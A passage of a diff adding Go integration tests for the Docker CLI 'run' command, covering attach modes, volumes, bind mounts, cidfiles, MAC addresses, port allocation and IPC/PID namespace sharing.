+ c.Fatalf("Container should have exited with error code 0") + } +} + +// Regression test for #6983 +func (s *DockerSuite) TestRunAttachStdOutOnlyTTYMode(c *check.C) { + _, exitCode := dockerCmd(c, "run", "-t", "-a", "stdout", "busybox", "true") + if exitCode != 0 { + c.Fatalf("Container should have exited with error code 0") + } +} + +// Regression test for #6983 +func (s *DockerSuite) TestRunAttachStdOutAndErrTTYMode(c *check.C) { + _, exitCode := dockerCmd(c, "run", "-t", "-a", "stdout", "-a", "stderr", "busybox", "true") + if exitCode != 0 { + c.Fatalf("Container should have exited with error code 0") + } +} + +// Test for #10388 - this will run the same test as TestRunAttachStdOutAndErrTTYMode +// but using --attach instead of -a to make sure we read the flag correctly +func (s *DockerSuite) TestRunAttachWithDetach(c *check.C) { + cmd := exec.Command(dockerBinary, "run", "-d", "--attach", "stdout", "busybox", "true") + _, stderr, _, err := runCommandWithStdoutStderr(cmd) + if err == nil { + c.Fatal("Container should have exited with error code different than 0") + } else if !strings.Contains(stderr, "Conflicting options: -a and -d") { + c.Fatal("Should have been returned an error with conflicting options -a and -d") + } +} + +func (s *DockerSuite) TestRunState(c *check.C) { + // TODO Windows: This needs some rework as Windows busybox does not support top + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + + id := strings.TrimSpace(out) + state := inspectField(c, id, "State.Running") + if state != "true" { + c.Fatal("Container state is 'not running'") + } + pid1 := inspectField(c, id, "State.Pid") + if pid1 == "0" { + c.Fatal("Container state Pid 0") + } + + dockerCmd(c, "stop", id) + state = inspectField(c, id, "State.Running") + if state != "false" { + c.Fatal("Container state is 'running'") + } + pid2 := inspectField(c, id, "State.Pid") + if pid2 == pid1 { + c.Fatalf("Container state Pid %s, but expected %s", pid2, pid1) + } + + dockerCmd(c, "start", id) + state = inspectField(c, id, "State.Running") + if state != "true" { + c.Fatal("Container state is 'not running'") + } + pid3 := inspectField(c, id, "State.Pid") + if pid3 == pid1 { + c.Fatalf("Container state Pid %s, but expected %s", pid2, pid1) + } +} + +// Test for #1737 +func (s *DockerSuite) TestRunCopyVolumeUIDGID(c *check.C) { + // Not applicable on Windows as it does not support uid or gid in this way + testRequires(c, DaemonIsLinux) + name := "testrunvolumesuidgid" + _, err := buildImage(name, + `FROM busybox + RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd + RUN echo 'dockerio:x:1001:' >> /etc/group + RUN mkdir -p /hello && touch /hello/test && chown dockerio.dockerio /hello`, + true) + if err != nil { + c.Fatal(err) + } + + // Test that the uid and gid is copied from the image to the volume + out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "sh", "-c", "ls -l / | grep hello | awk '{print $3\":\"$4}'") + out = strings.TrimSpace(out) + if out != "dockerio:dockerio" { + c.Fatalf("Wrong /hello ownership: %s, expected dockerio:dockerio", out) + } +} + +// Test for #1582 +func (s *DockerSuite) TestRunCopyVolumeContent(c *check.C) { + // TODO Windows, post TP5. Windows does not yet support volume functionality + // that copies from the image to the volume. + testRequires(c, DaemonIsLinux) + name := "testruncopyvolumecontent" + _, err := buildImage(name, + `FROM busybox + RUN mkdir -p /hello/local && echo hello > /hello/local/world`, + true) + if err != nil { + c.Fatal(err) + } + + // Test that the content is copied from the image to the volume + out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "find", "/hello") + if !(strings.Contains(out, "/hello/local/world") && strings.Contains(out, "/hello/local")) { + c.Fatal("Container failed to transfer content to volume") + } +} + +func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) { + name := "testrunmdcleanuponentrypoint" + if _, err := buildImage(name, + `FROM busybox + ENTRYPOINT ["echo"] + CMD ["testingpoint"]`, + true); err != nil { + c.Fatal(err) + } + + out, exit := dockerCmd(c, "run", "--entrypoint", "whoami", name) + if exit != 0 { + c.Fatalf("expected exit code 0 received %d, out: %q", exit, out) + } + out = strings.TrimSpace(out) + expected := "root" + if daemonPlatform == "windows" { + if strings.Contains(WindowsBaseImage, "windowsservercore") { + expected = `user manager\containeradministrator` + } else { + expected = `ContainerAdministrator` // nanoserver + } + } + if out != expected { + c.Fatalf("Expected output %s, got %q. %s", expected, out, WindowsBaseImage) + } +} + +// TestRunWorkdirExistsAndIsFile checks that if 'docker run -w' with existing file can be detected +func (s *DockerSuite) TestRunWorkdirExistsAndIsFile(c *check.C) { + existingFile := "/bin/cat" + expected := "not a directory" + if daemonPlatform == "windows" { + existingFile = `\windows\system32\ntdll.dll` + expected = `The directory name is invalid.` + } + + out, exitCode, err := dockerCmdWithError("run", "-w", existingFile, "busybox") + if !(err != nil && exitCode == 125 && strings.Contains(out, expected)) { + c.Fatalf("Existing binary as a directory should error out with exitCode 125; we got: %s, exitCode: %d", out, exitCode) + } +} + +func (s *DockerSuite) TestRunExitOnStdinClose(c *check.C) { + name := "testrunexitonstdinclose" + + meow := "/bin/cat" + delay := 60 + if daemonPlatform == "windows" { + meow = "cat" + } + runCmd := exec.Command(dockerBinary, "run", "--name", name, "-i", "busybox", meow) + + stdin, err := runCmd.StdinPipe() + if err != nil { + c.Fatal(err) + } + stdout, err := runCmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + + if err := runCmd.Start(); err != nil { + c.Fatal(err) + } + if _, err := stdin.Write([]byte("hello\n")); err != nil { + c.Fatal(err) + } + + r := bufio.NewReader(stdout) + line, err := r.ReadString('\n') + if err != nil { + c.Fatal(err) + } + line = strings.TrimSpace(line) + if line != "hello" { + c.Fatalf("Output should be 'hello', got '%q'", line) + } + if err := stdin.Close(); err != nil { + c.Fatal(err) + } + finish := make(chan error) + go func() { + finish <- runCmd.Wait() + close(finish) + }() + select { + case err := <-finish: + c.Assert(err, check.IsNil) + case <-time.After(time.Duration(delay) * time.Second): + c.Fatal("docker run failed to exit on stdin close") + } + state := inspectField(c, name, "State.Running") + + if state != "false" { + c.Fatal("Container must be stopped after stdin closing") + } +} + +// Test run -i --restart xxx doesn't hang +func (s *DockerSuite) TestRunInteractiveWithRestartPolicy(c *check.C) { + name := "test-inter-restart" + + result := icmd.StartCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-i", "--name", name, "--restart=always", "busybox", "sh"}, + Stdin: bytes.NewBufferString("exit 11"), + }) + c.Assert(result.Error, checker.IsNil) + defer func() { + dockerCmdWithResult("stop", name).Assert(c, icmd.Success) + }() + + result = icmd.WaitOnCmd(60*time.Second, result) + c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 11}) +} + +// Test for #2267 +func (s *DockerSuite) TestRunWriteHostsFileAndNotCommit(c *check.C) { + // Cannot run on Windows as Windows does not support diff. + testRequires(c, DaemonIsLinux) + name := "writehosts" + out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hosts && cat /etc/hosts") + if !strings.Contains(out, "test2267") { + c.Fatal("/etc/hosts should contain 'test2267'") + } + + out, _ = dockerCmd(c, "diff", name) + if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) { + c.Fatal("diff should be empty") + } +} + +func eqToBaseDiff(out string, c *check.C) bool { + name := "eqToBaseDiff" + stringutils.GenerateRandomAlphaOnlyString(32) + dockerCmd(c, "run", "--name", name, "busybox", "echo", "hello") + cID, err := getIDByName(name) + c.Assert(err, check.IsNil) + + baseDiff, _ := dockerCmd(c, "diff", cID) + baseArr := strings.Split(baseDiff, "\n") + sort.Strings(baseArr) + outArr := strings.Split(out, "\n") + sort.Strings(outArr) + return sliceEq(baseArr, outArr) +} + +func sliceEq(a, b []string) bool { + if len(a) != len(b) { + return false + } + + for i := range a { + if a[i] != b[i] { + return false + } + } + + return true +} + +// Test for #2267 +func (s *DockerSuite) TestRunWriteHostnameFileAndNotCommit(c *check.C) { + // Cannot run on Windows as Windows does not support diff. + testRequires(c, DaemonIsLinux) + name := "writehostname" + out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hostname && cat /etc/hostname") + if !strings.Contains(out, "test2267") { + c.Fatal("/etc/hostname should contain 'test2267'") + } + + out, _ = dockerCmd(c, "diff", name) + if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) { + c.Fatal("diff should be empty") + } +} + +// Test for #2267 +func (s *DockerSuite) TestRunWriteResolvFileAndNotCommit(c *check.C) { + // Cannot run on Windows as Windows does not support diff. + testRequires(c, DaemonIsLinux) + name := "writeresolv" + out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/resolv.conf && cat /etc/resolv.conf") + if !strings.Contains(out, "test2267") { + c.Fatal("/etc/resolv.conf should contain 'test2267'") + } + + out, _ = dockerCmd(c, "diff", name) + if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) { + c.Fatal("diff should be empty") + } +} + +func (s *DockerSuite) TestRunWithBadDevice(c *check.C) { + // Cannot run on Windows as Windows does not support --device + testRequires(c, DaemonIsLinux) + name := "baddevice" + out, _, err := dockerCmdWithError("run", "--name", name, "--device", "/etc", "busybox", "true") + + if err == nil { + c.Fatal("Run should fail with bad device") + } + expected := `"/etc": not a device node` + if !strings.Contains(out, expected) { + c.Fatalf("Output should contain %q, actual out: %q", expected, out) + } +} + +func (s *DockerSuite) TestRunEntrypoint(c *check.C) { + name := "entrypoint" + + out, _ := dockerCmd(c, "run", "--name", name, "--entrypoint", "echo", "busybox", "-n", "foobar") + expected := "foobar" + + if out != expected { + c.Fatalf("Output should be %q, actual out: %q", expected, out) + } +} + +func (s *DockerSuite) TestRunBindMounts(c *check.C) { + testRequires(c, SameHostDaemon) + if daemonPlatform == "linux" { + testRequires(c, DaemonIsLinux, NotUserNamespace) + } + + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + + tmpDir, err := ioutil.TempDir("", "docker-test-container") + if err != nil { + c.Fatal(err) + } + + defer os.RemoveAll(tmpDir) + writeFile(path.Join(tmpDir, "touch-me"), "", c) + + // TODO Windows: Temporary check - remove once TP5 support is dropped + if daemonPlatform != "windows" || windowsDaemonKV >= 14350 { + // Test reading from a read-only bind mount + out, _ := dockerCmd(c, "run", "-v", fmt.Sprintf("%s:%s/tmp:ro", tmpDir, prefix), "busybox", "ls", prefix+"/tmp") + if !strings.Contains(out, "touch-me") { + c.Fatal("Container failed to read from bind mount") + } + } + + // test writing to bind mount + if daemonPlatform == "windows" { + dockerCmd(c, "run", "-v", fmt.Sprintf(`%s:c:\tmp:rw`, tmpDir), "busybox", "touch", "c:/tmp/holla") + } else { + dockerCmd(c, "run", "-v", fmt.Sprintf("%s:/tmp:rw", tmpDir), "busybox", "touch", "/tmp/holla") + } + + readFile(path.Join(tmpDir, "holla"), c) // Will fail if the file doesn't exist + + // test mounting to an illegal destination directory + _, _, err = dockerCmdWithError("run", "-v", fmt.Sprintf("%s:.", tmpDir), "busybox", "ls", ".") + if err == nil { + c.Fatal("Container bind mounted illegal directory") + } + + // Windows does not (and likely never will) support mounting a single file + if daemonPlatform != "windows" { + // test mount a file + dockerCmd(c, "run", "-v", fmt.Sprintf("%s/holla:/tmp/holla:rw", tmpDir), "busybox", "sh", "-c", "echo -n 'yotta' > /tmp/holla") + content := readFile(path.Join(tmpDir, "holla"), c) // Will fail if the file doesn't exist + expected := "yotta" + if content != expected { + c.Fatalf("Output should be %q, actual out: %q", expected, content) + } + } +} + +// Ensure that CIDFile gets deleted if it's empty +// Perform this test by making `docker run` fail +func (s *DockerSuite) TestRunCidFileCleanupIfEmpty(c *check.C) { + // Skip on Windows. Base image on Windows has a CMD set in the image. + testRequires(c, DaemonIsLinux) + + tmpDir, err := ioutil.TempDir("", "TestRunCidFile") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + tmpCidFile := path.Join(tmpDir, "cid") + + image := "emptyfs" + if daemonPlatform == "windows" { + // Windows can't support an emptyfs image. Just use the regular Windows image + image = WindowsBaseImage + } + out, _, err := dockerCmdWithError("run", "--cidfile", tmpCidFile, image) + if err == nil { + c.Fatalf("Run without command must fail. out=%s", out) + } else if !strings.Contains(out, "No command specified") { + c.Fatalf("Run without command failed with wrong output. out=%s\nerr=%v", out, err) + } + + if _, err := os.Stat(tmpCidFile); err == nil { + c.Fatalf("empty CIDFile %q should've been deleted", tmpCidFile) + } +} + +// #2098 - Docker cidFiles only contain short version of the containerId +//sudo docker run --cidfile /tmp/docker_tesc.cid ubuntu echo "test" +// TestRunCidFile tests that run --cidfile returns the longid +func (s *DockerSuite) TestRunCidFileCheckIDLength(c *check.C) { + tmpDir, err := ioutil.TempDir("", "TestRunCidFile") + if err != nil { + c.Fatal(err) + } + tmpCidFile := path.Join(tmpDir, "cid") + defer os.RemoveAll(tmpDir) + + out, _ := dockerCmd(c, "run", "-d", "--cidfile", tmpCidFile, "busybox", "true") + + id := strings.TrimSpace(out) + buffer, err := ioutil.ReadFile(tmpCidFile) + if err != nil { + c.Fatal(err) + } + cid := string(buffer) + if len(cid) != 64 { + c.Fatalf("--cidfile should be a long id, not %q", id) + } + if cid != id { + c.Fatalf("cid must be equal to %s, got %s", id, cid) + } +} + +func (s *DockerSuite) TestRunSetMacAddress(c *check.C) { + mac := "12:34:56:78:9a:bc" + var out string + if daemonPlatform == "windows" { + out, _ = dockerCmd(c, "run", "-i", "--rm", fmt.Sprintf("--mac-address=%s", mac), "busybox", "sh", "-c", "ipconfig /all | grep 'Physical Address' | awk '{print $12}'") + mac = strings.Replace(strings.ToUpper(mac), ":", "-", -1) // To Windows-style MACs + } else { + out, _ = dockerCmd(c, "run", "-i", "--rm", fmt.Sprintf("--mac-address=%s", mac), "busybox", "/bin/sh", "-c", "ip link show eth0 | tail -1 | awk '{print $2}'") + } + + actualMac := strings.TrimSpace(out) + if actualMac != mac { + c.Fatalf("Set MAC address with --mac-address failed. The container has an incorrect MAC address: %q, expected: %q", actualMac, mac) + } +} + +func (s *DockerSuite) TestRunInspectMacAddress(c *check.C) { + // TODO Windows. Network settings are not propagated back to inspect. + testRequires(c, DaemonIsLinux) + mac := "12:34:56:78:9a:bc" + out, _ := dockerCmd(c, "run", "-d", "--mac-address="+mac, "busybox", "top") + + id := strings.TrimSpace(out) + inspectedMac := inspectField(c, id, "NetworkSettings.Networks.bridge.MacAddress") + if inspectedMac != mac { + c.Fatalf("docker inspect outputs wrong MAC address: %q, should be: %q", inspectedMac, mac) + } +} + +// test docker run use an invalid mac address +func (s *DockerSuite) TestRunWithInvalidMacAddress(c *check.C) { + out, _, err := dockerCmdWithError("run", "--mac-address", "92:d0:c6:0a:29", "busybox") + //use an invalid mac address should with an error out + if err == nil || !strings.Contains(out, "is not a valid mac address") { + c.Fatalf("run with an invalid --mac-address should with error out") + } +} + +func (s *DockerSuite) TestRunDeallocatePortOnMissingIptablesRule(c *check.C) { + // TODO Windows. Network settings are not propagated back to inspect. + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top") + + id := strings.TrimSpace(out) + ip := inspectField(c, id, "NetworkSettings.Networks.bridge.IPAddress") + iptCmd := exec.Command("iptables", "-D", "DOCKER", "-d", fmt.Sprintf("%s/32", ip), + "!", "-i", "docker0", "-o", "docker0", "-p", "tcp", "-m", "tcp", "--dport", "23", "-j", "ACCEPT") + out, _, err := runCommandWithOutput(iptCmd) + if err != nil { + c.Fatal(err, out) + } + if err := deleteContainer(id); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top") +} + +func (s *DockerSuite) TestRunPortInUse(c *check.C) { + // TODO Windows. The duplicate NAT message returned by Windows will be + // changing as is currently completely undecipherable. Does need modifying + // to run sh rather than top though as top isn't in Windows busybox. + testRequires(c, SameHostDaemon, DaemonIsLinux) + + port := "1234" + dockerCmd(c, "run", "-d", "-p", port+":80", "busybox", "top") + + out, _, err := dockerCmdWithError("run", "-d", "-p", port+":80", "busybox", "top") + if err == nil { + c.Fatalf("Binding on used port must fail") + } + if !strings.Contains(out, "port is already allocated") { + c.Fatalf("Out must be about \"port is already allocated\", got %s", out) + } +} + +// https://github.com/docker/docker/issues/12148 +func (s *DockerSuite) TestRunAllocatePortInReservedRange(c *check.C) { + // TODO Windows. -P is not yet supported + testRequires(c, DaemonIsLinux) + // allocate a dynamic port to get the most recent + out, _ := dockerCmd(c, "run", "-d", "-P", "-p", "80", "busybox", "top") + + id := strings.TrimSpace(out) + out, _ = dockerCmd(c, "port", id, "80") + + strPort := strings.Split(strings.TrimSpace(out), ":")[1] + port, err := strconv.ParseInt(strPort, 10, 64) + if err != nil { + c.Fatalf("invalid port, got: %s, error: %s", strPort, err) + } + + // allocate a static port and a dynamic port together, with static port + // takes the next recent port in dynamic port range. + dockerCmd(c, "run", "-d", "-P", "-p", "80", "-p", fmt.Sprintf("%d:8080", port+1), "busybox", "top") +} + +// Regression test for #7792 +func (s *DockerSuite) TestRunMountOrdering(c *check.C) { + // TODO Windows: Post TP5. Updated, but Windows does not support nested mounts currently. + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + + tmpDir, err := ioutil.TempDir("", "docker_nested_mount_test") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + tmpDir2, err := ioutil.TempDir("", "docker_nested_mount_test2") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir2) + + // Create a temporary tmpfs mounc. + fooDir := filepath.Join(tmpDir, "foo") + if err := os.MkdirAll(filepath.Join(tmpDir, "foo"), 0755); err != nil { + c.Fatalf("failed to mkdir at %s - %s", fooDir, err) + } + + if err := ioutil.WriteFile(fmt.Sprintf("%s/touch-me", fooDir), []byte{}, 0644); err != nil { + c.Fatal(err) + } + + if err := ioutil.WriteFile(fmt.Sprintf("%s/touch-me", tmpDir), []byte{}, 0644); err != nil { + c.Fatal(err) + } + + if err := ioutil.WriteFile(fmt.Sprintf("%s/touch-me", tmpDir2), []byte{}, 0644); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", + "-v", fmt.Sprintf("%s:"+prefix+"/tmp", tmpDir), + "-v", fmt.Sprintf("%s:"+prefix+"/tmp/foo", fooDir), + "-v", fmt.Sprintf("%s:"+prefix+"/tmp/tmp2", tmpDir2), + "-v", fmt.Sprintf("%s:"+prefix+"/tmp/tmp2/foo", fooDir), + "busybox:latest", "sh", "-c", + "ls "+prefix+"/tmp/touch-me && ls "+prefix+"/tmp/foo/touch-me && ls "+prefix+"/tmp/tmp2/touch-me && ls "+prefix+"/tmp/tmp2/foo/touch-me") +} + +// Regression test for https://github.com/docker/docker/issues/8259 +func (s *DockerSuite) TestRunReuseBindVolumeThatIsSymlink(c *check.C) { + // Not applicable on Windows as Windows does not support volumes + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + + tmpDir, err := ioutil.TempDir(os.TempDir(), "testlink") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + linkPath := os.TempDir() + "/testlink2" + if err := os.Symlink(tmpDir, linkPath); err != nil { + c.Fatal(err) + } + defer os.RemoveAll(linkPath) + + // Create first container + dockerCmd(c, "run", "-v", fmt.Sprintf("%s:"+prefix+"/tmp/test", linkPath), "busybox", "ls", prefix+"/tmp/test") + + // Create second container with same symlinked path + // This will fail if the referenced issue is hit with a "Volume exists" error + dockerCmd(c, "run", "-v", fmt.Sprintf("%s:"+prefix+"/tmp/test", linkPath), "busybox", "ls", prefix+"/tmp/test") +} + +//GH#10604: Test an "/etc" volume doesn't overlay special bind mounts in container +func (s *DockerSuite) TestRunCreateVolumeEtc(c *check.C) { + // While Windows supports volumes, it does not support --add-host hence + // this test is not applicable on Windows. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--dns=127.0.0.1", "-v", "/etc", "busybox", "cat", "/etc/resolv.conf") + if !strings.Contains(out, "nameserver 127.0.0.1") { + c.Fatal("/etc volume mount hides /etc/resolv.conf") + } + + out, _ = dockerCmd(c, "run", "-h=test123", "-v", "/etc", "busybox", "cat", "/etc/hostname") + if !strings.Contains(out, "test123") { + c.Fatal("/etc volume mount hides /etc/hostname") + } + + out, _ = dockerCmd(c, "run", "--add-host=test:192.168.0.1", "-v", "/etc", "busybox", "cat", "/etc/hosts") + out = strings.Replace(out, "\n", " ", -1) + if !strings.Contains(out, "192.168.0.1\ttest") || !strings.Contains(out, "127.0.0.1\tlocalhost") { + c.Fatal("/etc volume mount hides /etc/hosts") + } +} + +func (s *DockerSuite) TestVolumesNoCopyData(c *check.C) { + // TODO Windows (Post RS1). Windows does not support volumes which + // are pre-populated such as is built in the dockerfile used in this test. + testRequires(c, DaemonIsLinux) + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + if _, err := buildImage("dataimage", + `FROM busybox + RUN ["mkdir", "-p", "/foo"] + RUN ["touch", "/foo/bar"]`, + true); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "--name", "test", "-v", prefix+slash+"foo", "busybox") + + if out, _, err := dockerCmdWithError("run", "--volumes-from", "test", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("Data was copied on volumes-from but shouldn't be:\n%q", out) + } + + tmpDir := randomTmpDirPath("docker_test_bind_mount_copy_data", daemonPlatform) + if out, _, err := dockerCmdWithError("run", "-v", tmpDir+":/foo", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("Data was copied on bind-mount but shouldn't be:\n%q", out) + } +} + +func (s *DockerSuite) TestRunNoOutputFromPullInStdout(c *check.C) { + // just run with unknown image + cmd := exec.Command(dockerBinary, "run", "asdfsg") + stdout := bytes.NewBuffer(nil) + cmd.Stdout = stdout + if err := cmd.Run(); err == nil { + c.Fatal("Run with unknown image should fail") + } + if stdout.Len() != 0 { + c.Fatalf("Stdout contains output from pull: %s", stdout) + } +} + +func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) { + testRequires(c, SameHostDaemon) + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + if _, err := buildImage("run_volumes_clean_paths", + `FROM busybox + VOLUME `+prefix+`/foo/`, + true); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-v", prefix+"/foo", "-v", prefix+"/bar/", "--name", "dark_helmet", "run_volumes_clean_paths") + + out, err := inspectMountSourceField("dark_helmet", prefix+slash+"foo"+slash) + if err != errMountNotFound { + c.Fatalf("Found unexpected volume entry for '%s/foo/' in volumes\n%q", prefix, out) + } + + out, err = inspectMountSourceField("dark_helmet", prefix+slash+`foo`) + c.Assert(err, check.IsNil) + if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) { + c.Fatalf("Volume was not defined for %s/foo\n%q", prefix, out) + } + + out, err = inspectMountSourceField("dark_helmet", prefix+slash+"bar"+slash) + if err != errMountNotFound { + c.Fatalf("Found unexpected volume entry for '%s/bar/' in volumes\n%q", prefix, out) + } + + out, err = inspectMountSourceField("dark_helmet", prefix+slash+"bar") + c.Assert(err, check.IsNil) + if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) { + c.Fatalf("Volume was not defined for %s/bar\n%q", prefix, out) + } +} + +// Regression test for #3631 +func (s *DockerSuite) TestRunSlowStdoutConsumer(c *check.C) { + // TODO Windows: This should be able to run on Windows if can find an + // alternate to /dev/zero and /dev/stdout. + testRequires(c, DaemonIsLinux) + cont := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "dd if=/dev/zero of=/dev/stdout bs=1024 count=2000 | catv") + + stdout, err := cont.StdoutPipe() + if err != nil { + c.Fatal(err) + } + + if err := cont.Start(); err != nil { + c.Fatal(err) + } + n, err := consumeWithSpeed(stdout, 10000, 5*time.Millisecond, nil) + if err != nil { + c.Fatal(err) + } + + expected := 2 * 1024 * 2000 + if n != expected { + c.Fatalf("Expected %d, got %d", expected, n) + } +} + +func (s *DockerSuite) TestRunAllowPortRangeThroughExpose(c *check.C) { + // TODO Windows: -P is not currently supported. Also network + // settings are not propagated back. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--expose", "3000-3003", "-P", "busybox", "top") + + id := strings.TrimSpace(out) + portstr := inspectFieldJSON(c, id, "NetworkSettings.Ports") + var ports nat.PortMap + if err := json.Unmarshal([]byte(portstr), &ports); err != nil { + c.Fatal(err) + } + for port, binding := range ports { + portnum, _ := strconv.Atoi(strings.Split(string(port), "/")[0]) + if portnum < 3000 || portnum > 3003 { + c.Fatalf("Port %d is out of range ", portnum) + } + if binding == nil || len(binding) != 1 || len(binding[0].HostPort) == 0 { + c.Fatalf("Port is not mapped for the port %s", port) + } + } +} + +func (s *DockerSuite) TestRunExposePort(c *check.C) { + out, _, err := dockerCmdWithError("run", "--expose", "80000", "busybox") + c.Assert(err, checker.NotNil, check.Commentf("--expose with an invalid port should error out")) + c.Assert(out, checker.Contains, "invalid range format for --expose") +} + +func (s *DockerSuite) TestRunModeIpcHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + hostIpc, err := os.Readlink("/proc/1/ns/ipc") + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--ipc=host", "busybox", "readlink", "/proc/self/ns/ipc") + out = strings.Trim(out, "\n") + if hostIpc != out { + c.Fatalf("IPC different with --ipc=host %s != %s\n", hostIpc, out) + } + + out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/ipc") + out = strings.Trim(out, "\n") + if hostIpc == out { + c.Fatalf("IPC should be different without --ipc=host %s == %s\n", hostIpc, out) + } +} + +func (s *DockerSuite) TestRunModeIpcContainer(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "echo -n test > /dev/shm/test && touch /dev/mqueue/toto && top") + + id := strings.TrimSpace(out) + state := inspectField(c, id, "State.Running") + if state != "true" { + c.Fatal("Container state is 'not running'") + } + pid1 := inspectField(c, id, "State.Pid") + + parentContainerIpc, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/ipc", pid1)) + if err != nil { + c.Fatal(err) + } + + out, _ = dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "readlink", "/proc/self/ns/ipc") + out = strings.Trim(out, "\n") + if parentContainerIpc != out { + c.Fatalf("IPC different with --ipc=container:%s %s != %s\n", id, parentContainerIpc, out) + } + + catOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "cat", "/dev/shm/test") + if catOutput != "test" { + c.Fatalf("Output of /dev/shm/test expected test but found: %s", catOutput) + } + + // check that /dev/mqueue is actually of mqueue type + grepOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "grep", "/dev/mqueue", "/proc/mounts") + if !strings.HasPrefix(grepOutput, "mqueue /dev/mqueue mqueue rw") { + c.Fatalf("Output of 'grep /proc/mounts' expected 'mqueue /dev/mqueue mqueue rw' but found: %s", grepOutput) + } + + lsOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "ls", "/dev/mqueue") + lsOutput = strings.Trim(lsOutput, "\n") + if lsOutput != "toto" { + c.Fatalf("Output of 'ls /dev/mqueue' expected 'toto' but found: %s", lsOutput) + } +} + +func (s *DockerSuite) TestRunModeIpcContainerNotExists(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "-d", "--ipc", "container:abcd1234", "busybox", "top") + if !strings.Contains(out, "abcd1234") || err == nil { + c.Fatalf("run IPC from a non exists container should with correct error out") + } +} + +func (s *DockerSuite) TestRunModeIpcContainerNotRunning(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "create", "busybox") + + id := strings.TrimSpace(out) + out, _, err := dockerCmdWithError("run", fmt.Sprintf("--ipc=container:%s", id), "busybox") + if err == nil { + c.Fatalf("Run container with ipc mode container should fail with non running container: %s\n%s", out, err) + } +} + +func (s *DockerSuite) TestRunModePIDContainer(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "top") + + id := strings.TrimSpace(out) + state := inspectField(c, id, "State.Running") + if state != "true" { + c.Fatal("Container state is 'not running'") + } + pid1 := inspectField(c, id, "State.Pid") + + parentContainerPid, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/pid", pid1)) + if err != nil { + c.Fatal(err) + } + + out, _ = dockerCmd(c, "run", fmt.Sprintf("--pid=container:%s", id), "busybox", "readlink", "/proc/self/ns/pid") + out = strings.Trim(out, "\n") + if parentContainerPid != out { + c.Fatalf("PID different with --pid=container:%s %s != %s\n", id, parentContainerPid, out) + } +} + +func (s *DockerSuite) TestRunModePIDContainerNotExists(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "-d", "--pid", "container:abcd1234", "busybox", "top") + if !strings.Contains(out, "abcd1234") || err == nil { + c.Fatalf("run PID from a non exists container should with correct error out") + } +} + +func (s *DockerSuite) TestRunModePIDContainerNotRunning(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := 